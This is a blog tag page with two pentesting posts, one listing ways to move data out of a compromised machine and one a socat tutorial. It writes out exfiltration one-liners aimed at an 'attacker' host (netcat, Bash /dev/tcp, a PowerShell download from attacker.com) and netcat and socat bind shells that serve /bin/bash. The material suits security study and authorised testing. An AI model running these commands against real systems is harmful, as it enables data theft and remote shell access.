Tag Archives for " netcat "
Data exfiltration from the CLI
If you do pentesting or any kind of security analysis you probably found yourself in the situation of needing to transfer data between your machine and the vulnerable machine. It is useful to know a few ways to do this in case one of them doesn’t work for your specific situation.
Generic
Samba can be configured on the attacker machine so that you can connect from the vulnerable
machine using the “net use” (windows) or “mount -t cifs” (linux) commands and then transfer files.
example:
net use z: \\192.168.1.20 /u:attacker
smb.conf http://www.samba.org/samba/docs/using_samba/ch06.html
FTP is another way we can do this, but remember that both the data and the login credentials travel in plain text, also since the client is interactive if you have a non-interactive shell you will need to script it.
example for the windows ftp client:
open ftp.domain.com
username
password
get file.txt
bye
run with ftp -s:script-name.txt
example for the linux ftp client:
http://www.stratigery.com/scripting.ftp.html
TFTP is a simpler version of ftp, it uses UDP and it doesn’t support authentication, a popular tftp server is Tftpd32. It’s still in use for things like backing up a router configuration or uploading the latest firmware.
SSH will allow us to transfer data in a safe manner, we can use the scp command to transfer files via ssh.
Netcat is also an option, it is usually available in most linux distributions, and there is also a
windows version. If you need encryption then you should try cryptcat or socat.
example:
echo data | nc 192.168.1.20 80
Linux specific
On linux you can use /dev/tcp/<host>/<port> to open connections to other host (you need to use a recent version of Bash for this to work), then we can use netcat to capture this data on the other end.
example:
echo secret_data.txt > /dev/tcp/192.168.1.20/500
Windows specific
In windows we can use powershell to open tcp connections, or download files from http.
example:
|
1 2 3 4 5 6 |
$http = New-Object System.Net.WebClient $url = "http://www.attacker.com" $file = "test.html" $http.DownloadFile($url, $file) |
As you can see there are many ways for transferring files, so pick the one that suits you best and enjoy!
Socat: A very powerful networking tool
Welcome to this socat tutorial. Socat is a network utility similar to netcat. Socat supports ipv6 and ssl and is available for both windows and linux. The first thing you will notice with this tool is that it has a different syntax on what you are used to with netcat or other standard unix tools.
|
1 |
socat [options] <address> <address> |
You have to provide both addresses in order for it to work, now these addresses look like this:
|
1 |
protocol:ip:port |
Let’s get started with some examples. First I want to show you how you can get the same functionality as with netcat.
|
1 2 |
nc localhost 80 socat - TCP4:localhost:80 OR socat STDIN TCP4:localhost:80 |
|
1 2 |
nc -lp localhost 700 socat TCP4-LISTEN:700 STDOUT |
|
1 2 |
nc -lp localhost 700 -e /bin/bash socat TCP4-LISTEN:700 EXEC:/bin/bash |
Now we can go beyond netcat with some ssl examples, but first we need to generate a ssl cert for the server.
Generate a SSL cert
openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key
SSL server
|
1 |
socat OPENSSL-LISTEN:443,cert=/cert.pem - |
SSL client
|
1 |
socat - OPENSSL:localhost:443 |
Both addresses don’t have to use the same protocol, so you can do “ssl server -> non-ssl server”. You should also check out the options that you can apply, for example you can use fork to tell socat to listen and handle multiple clients.
|
1 |
socat TCP4-LISTEN:5000,fork OPENSSL:localhost:443 |
Finally if you are tunneling a connection between servers using socat you can use the -v option to print all the traffic to stdout.
I hope you enjoyed this quick socat tutorial. If you want to learn more, check out the socat man page, section “ADDRESS TYPES” or the online documentation.